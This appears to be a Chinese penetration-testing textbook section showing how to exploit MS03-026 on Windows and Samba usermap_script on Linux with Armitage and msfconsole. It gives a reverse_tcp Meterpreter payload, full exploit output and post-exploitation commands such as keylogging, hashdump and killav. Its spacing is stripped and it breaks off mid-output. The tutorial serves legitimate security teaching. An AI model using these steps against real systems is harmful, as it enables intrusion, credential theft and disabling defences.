6.4對(duì)Linux和Windows服務(wù)器實(shí)施滲透測(cè)試Metasploit是rapid7公司的一款優(yōu)秀的滲透測(cè)試工具,用漏洞掃描工具找到對(duì)方漏洞后,可用Metasploit對(duì)這些漏洞進(jìn)行做滲透測(cè)試。測(cè)試一般采用命令行界面的Metasploit框架版(TheMetasploitFramework,簡(jiǎn)稱MSF),啟動(dòng)方式是在shell中輸入msfconsole;另外,初學(xué)者還可選用圖形界面的Armitage,Armitage通過(guò)調(diào)用Metasploit,對(duì)主機(jī)存在的漏洞實(shí)施自動(dòng)化的攻擊,實(shí)施滲透測(cè)試。任務(wù)6.4.1通過(guò)圖形界面對(duì)服務(wù)器實(shí)施滲透測(cè)試

采用圖形界面的Armitage,用戶不需要輸入太多參數(shù),就可自動(dòng)化的調(diào)用Metasploit,對(duì)目標(biāo)主機(jī)實(shí)施滲透測(cè)試。直觀形象的界面,便于初學(xué)者掌握。一、掃描目標(biāo)主機(jī)1.啟動(dòng)Armitage方法是先在shell中輸入msfdbinit,然后再輸入armitage。root@kali:~#msfdbinitroot@kali:~#armitage2.在shell中輸入armitage后,彈出連接對(duì)話框,如圖6-4-1所示,點(diǎn)擊“Connect”按鈕。圖6-4-1啟動(dòng)armitage連接到metasploit3.如圖6-4-2所示,提示將要啟動(dòng)和連接MetasploitRPCserver,點(diǎn)擊“Yes”按鈕。4.Armitage界面啟動(dòng)后,如圖6-4-3所示,點(diǎn)擊菜單“Hosts”/“NmapScan”/“QuickScan(OSdetect)”。圖6-4-2啟動(dòng)Metasploit圖6-4-3對(duì)Hosts進(jìn)行QuickScan(OSdetect)5.如圖6-4-4所示,在彈出的掃描范圍對(duì)話框中,輸入“2-13”,點(diǎn)擊“OK”按鈕。6.如圖6-4-5所示,掃描結(jié)束后,可以看到IP地址是3的windows服務(wù)器和IP地址是2的Linux服務(wù)器都出現(xiàn)在掃描結(jié)果中。圖6-4-4掃描范圍對(duì)話框圖6-4-5顯示掃描結(jié)果二、利用windows服務(wù)器的03_026漏洞,對(duì)目標(biāo)windows服務(wù)器實(shí)施攻擊。1.如圖6-4-6所示,點(diǎn)擊菜單“Attacks”/“FindAttacks”。圖6-4-6查找可用攻擊菜單2.如圖6-4-7所示,經(jīng)過(guò)篩選,軟件為目標(biāo)主機(jī)找出了可用的攻擊工具,附在每臺(tái)目標(biāo)主機(jī)的右擊菜單中,供用戶選擇。圖6-4-7攻擊分析結(jié)束提示框3.如圖6-4-8所示,右擊IP地址為3的windows服務(wù)器,選擇“Attack”/“dcerpc”/“ms03_026_dcom”,這個(gè)漏洞在上一小節(jié)中,用Nessus也掃到過(guò)的一個(gè)嚴(yán)重漏洞。圖6-4-8運(yùn)行對(duì)windows服務(wù)器的ms03_026攻擊4.如圖6-4-9所示,攻擊參數(shù)已經(jīng)自動(dòng)按默認(rèn)值填好,點(diǎn)擊“Launch”按鈕,就可以開(kāi)始攻擊了。圖6-4-9攻擊參數(shù)設(shè)置

5.攻擊成功后,目標(biāo)主機(jī)的圖標(biāo)變成如圖6-4-10所示的樣子。6.如圖6-4-11所示,右擊目標(biāo)主機(jī)的圖標(biāo),選擇“Meterpreter1”/“Interact”/“CommandShell”,進(jìn)入目標(biāo)主機(jī)的命令行模式,此模式下可執(zhí)行命令,操控目標(biāo)主機(jī)。圖6-4-10攻擊成功圖標(biāo)圖6-4-11進(jìn)入已獲取控制權(quán)的服務(wù)器的命令提示符7.如圖6-4-12所示,輸入ipconfig命令,可以顯示出命令成功執(zhí)行的結(jié)果。圖6-4-12對(duì)被控服務(wù)器輸入命令查看效果三、利用Linux服務(wù)器Samba服務(wù)的usermap_scrip安全漏洞,實(shí)施對(duì)Linux目標(biāo)服務(wù)器的攻擊。1.如圖6-4-13所示,右擊被掃描到有漏洞的Linux主機(jī),在彈出的菜單中選擇“Attack”/“samba”/“usermap_script”。圖6-4-13對(duì)Linux服務(wù)器發(fā)起基于samba的usermap_script攻擊2.如圖6-4-14所示,攻擊參數(shù)已經(jīng)自動(dòng)按默認(rèn)值填好,點(diǎn)擊“Launch”按鈕,就可以開(kāi)始攻擊了。圖6-4-14輸入攻擊參數(shù)3.攻擊成功后,圖標(biāo)顯示的效果變成如圖6-4-15所示的效果,在圖標(biāo)上點(diǎn)擊右鍵,選擇“Shell2”/“Interact”,進(jìn)入被攻擊者的交互界面。4.在交互界面中,輸入uname-a和whoami命令,測(cè)試運(yùn)行效果。5.可以看到,交互界面給出了正確的響應(yīng)。圖6-4-15攻擊成功后,選擇被攻擊者的交互界面圖6-4-16進(jìn)入被攻擊服務(wù)器的交換界面,輸入命令查看響應(yīng)謝謝欣賞第6章

網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)任務(wù)6.4.2通過(guò)命令行界面對(duì)服務(wù)器實(shí)施滲透測(cè)試

任務(wù)6.4.2通過(guò)命令行界面對(duì)服務(wù)器實(shí)施滲透測(cè)試

除了圖形界面,還可使用命令行界面的Metasploit框架版(TheMetasploitFramework,簡(jiǎn)稱MSF),Metasploit框架版可以針對(duì)目標(biāo)的漏洞,提供相應(yīng)的發(fā)射器和惡意代碼。攻擊者采用發(fā)射器,可將惡意代碼發(fā)射到目標(biāo)主機(jī)上并隱蔽起來(lái),惡意代碼可接受攻擊者的控制。一、Metasploit涉及的一些概念vulnerability:被攻擊主機(jī)上的漏洞、薄弱點(diǎn)。exploit:用于發(fā)射惡意代碼的發(fā)射器。利用被攻擊者的漏洞和弱點(diǎn),發(fā)射器可將木馬等惡意代碼植入到被攻擊者主機(jī)。payload:是攻擊者用發(fā)射器發(fā)射并隱藏到被攻擊者主機(jī)內(nèi)惡意代碼,如木馬等。利用被攻擊者主機(jī)上的漏洞,攻擊者可使用exploit發(fā)射器發(fā)射惡意代碼payload,將惡意代碼payload發(fā)射到攻擊者的主機(jī),隱蔽的植入到被攻擊者主機(jī)內(nèi)部。Metasploit擁有大量?jī)?yōu)秀的、在線更新的exploit和paylaod。其中,Meterpreter是眾多載荷中最受歡迎的payload。二、Metasploit框架結(jié)構(gòu)MSF的操作步驟。一)針對(duì)被攻擊者主機(jī)的漏洞,選擇用于發(fā)射惡意代碼的發(fā)射器exploit。1.search:查看可用的發(fā)射器exploits。2.use:選用合適的發(fā)射器exploits。二)選用攻擊載荷payload(如木馬等惡意代碼),并設(shè)置相關(guān)參數(shù)。1.showpayloads:查看所有可選的攻擊載荷(惡意代碼)。2.setpayload:從大量的攻擊載荷payloads中,選擇一個(gè),一般選用Meterpreter作為攻擊載荷。3.showoptions:查看攻擊載荷的配置選項(xiàng)。4.set:設(shè)置攻擊載荷的配置選項(xiàng)、設(shè)置相關(guān)參數(shù)。三)查看適用的操作系統(tǒng)1.showtargets:查看所選的發(fā)射器和攻擊載荷適用的操作系統(tǒng)及版本,如果與被攻擊者的不符,則無(wú)法實(shí)施攻擊。2.settarget設(shè)置攻擊的操作系統(tǒng)。四)實(shí)施攻擊exploit:使用選好的發(fā)射器exploit和攻擊載荷payload,執(zhí)行滲透測(cè)試攻擊,效果和run一樣。參數(shù)–j表示攻擊在后臺(tái)進(jìn)行。以上是完整的步驟,根據(jù)實(shí)際情況,操作中可以省去其中某些步驟。三、攻擊載荷Meterpreter常用命令Meterpreter是最常用的攻擊載荷,其常用的命令如下:1.background回到后臺(tái),即上一個(gè)命令提示符。2.sessions每個(gè)攻擊為一個(gè)會(huì)話,每個(gè)會(huì)話有一個(gè)唯一的ID,使用sessions命令可查看當(dāng)前有哪些會(huì)話,即有哪些主機(jī)被控制了。使用session-h命令可查看幫助信息。使用sessionsID命令可切換到指定的session會(huì)話。使用session-kID命令可關(guān)閉指定的session會(huì)話。3.screenshot對(duì)被攻擊主機(jī)截屏,保存到本地。4.sysinfo顯示被攻擊主機(jī)的系統(tǒng)信息。5.ps查看被攻擊主機(jī)正在運(yùn)行的進(jìn)程。6.migrate將meterpreter遷移到相對(duì)穩(wěn)定的進(jìn)程中。7.runkeylogrecorder鍵盤(pán)記錄8.runhashdump收集被攻擊者主機(jī)的密碼哈希值9.runvnc打開(kāi)被攻擊者主機(jī)的桌面10.runkillav關(guān)閉被攻擊者主機(jī)的殺毒軟件。四、對(duì)Windows服務(wù)器實(shí)施MS03-026漏洞攻擊上一小節(jié),我們通過(guò)Nessus掃描到了Windows服務(wù)器存在MS03-026漏洞。下面學(xué)習(xí)如何針對(duì)該已知漏洞,用命令行界面對(duì)目標(biāo)系統(tǒng)實(shí)施滲透測(cè)試攻擊。1.打開(kāi)命令行界面,輸入msfconsole命令。root@kali:~/Downloads#msfconsole2.輸入searchms03-026命令,查找針對(duì)漏洞ms03-026的exploit發(fā)射器。msf>searchms03-026[!]Moduledatabasecachenotbuiltyet,usingslowsearchMatchingModules================NameDisclosureDateRankDescription-----------------------------------exploit/windows/dcerpc/ms03_026_dcom2003-07-16greatMS03-026MicrosoftRPCDCOMInterfaceOverflow查找到針對(duì)該漏洞的發(fā)射器:exploit/windows/dcerpc/ms03_026_dcom3.通過(guò)useexploit/windows/dcerpc/ms03_026_dcom命令,選用該exploit發(fā)射器。msf>useexploit/windows/dcerpc/ms03_026_dcom4.通過(guò)showpayloads命令,查看所有可選的攻擊載荷payload(惡意代碼)。msfexploit(windows/dcerpc/ms03_026_dcom)>showpayloads可以看到,可用的payload攻擊載荷很多。其中,windows/meterpreter/bind_tcp是kali主動(dòng)聯(lián)系被攻擊者,如果要經(jīng)過(guò)防火墻,易被過(guò)濾掉,不容易成功;我們將采用windows/meterpreter/reverse_tcp,此時(shí),受害者將主動(dòng)聯(lián)系kali,防火墻一般會(huì)放行。5.將“windows/meterpreter/reverse_tcp”選為攻擊載荷。msfexploit(windows/dcerpc/ms03_026_dcom)>setpayloadwindows/meterpreter/reverse_tcppayload=>windows/meterpreter/reverse_tcp6.通過(guò)showoptions命令,查看攻擊載荷payload的配置選項(xiàng)。msfexploit(windows/dcerpc/ms03_026_dcom)>showoptionsModuleoptions(exploit/windows/dcerpc/ms03_026_dcom):NameCurrentSettingRequiredDescription--------------------------------------RHOSTyesThetargetaddressRPORT135yesThetargetport(TCP)Payloadoptions(windows/meterpreter/reverse_tcp):NameCurrentSettingRequiredDescription--------------------------------------EXITFUNCthreadyesExittechnique(Accepted:'',seh,thread,process,none)LHOSTyesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal7.set:設(shè)置攻擊載荷的配置選項(xiàng)、設(shè)置相關(guān)參數(shù)。msfexploit(windows/dcerpc/ms03_026_dcom)>setrhost3rhost=>3msfexploit(windows/dcerpc/ms03_026_dcom)>setlhost1lhost=>1三)查看適用的操作系統(tǒng)1.showtargets:查看所選的發(fā)射器和攻擊載荷適用的操作系統(tǒng)及版本,如果與被攻擊者的不符,則無(wú)法實(shí)施攻擊。msfexploit(windows/dcerpc/ms03_026_dcom)>showtargetsExploittargets:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal可見(jiàn),ID號(hào)為0的target,適用的目標(biāo)操作系統(tǒng)及版本為WindowsNTSP3-6a/2000/XP/2003Universal。2.選用目標(biāo)操作系統(tǒng)對(duì)應(yīng)的ID號(hào)為0。msfexploit(windows/dcerpc/ms03_026_dcom)>settarget0target=>0四)實(shí)施攻擊1.exploit:使用選好的發(fā)射器exploit和攻擊載荷payload,執(zhí)行滲透測(cè)試攻擊。msfexploit(windows/dcerpc/ms03_026_dcom)>exploit[*]StartedreverseTCPhandleron1:4444[*]3:135-TryingtargetWindowsNTSP3-6a/2000/XP/2003Universal...[*]3:135-Bindingto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Boundto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Sendingexploit...[*]Sendingstage(179779bytes)to3[*]Sleepingbeforehandlingstage...[*]Meterpretersession1opened(1:4444->3:3177)at2018-12-3020:26:40-0500meterpreter>可以看到,攻擊成功,payload被發(fā)射到目標(biāo)系統(tǒng)中。五)操控被攻擊服務(wù)器1.查看被攻擊服務(wù)器的信息meterpreter>sysinfoComputer:ROOT-TVI862UBEHOS:Windows.NETServer(Build3790).Architecture:x86SystemLanguage:en_USDomain:WORKGROUPLoggedOnUsers:2Meterpreter:x86/windows2.進(jìn)入被攻擊服務(wù)器的命令行界面meterpreter>shellProcess2396created.Channel1created.MicrosoftWindows[Version5.2.3790](C)Copyright1985-2003MicrosoftCorp.3.執(zhí)行命令,操控被攻擊主機(jī),如執(zhí)行ipconfig等命令。C:\WINDOWS\system32>ipconfigipconfigWindowsIPConfigurationEthernetadapterLocalAreaConnection:Conne

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論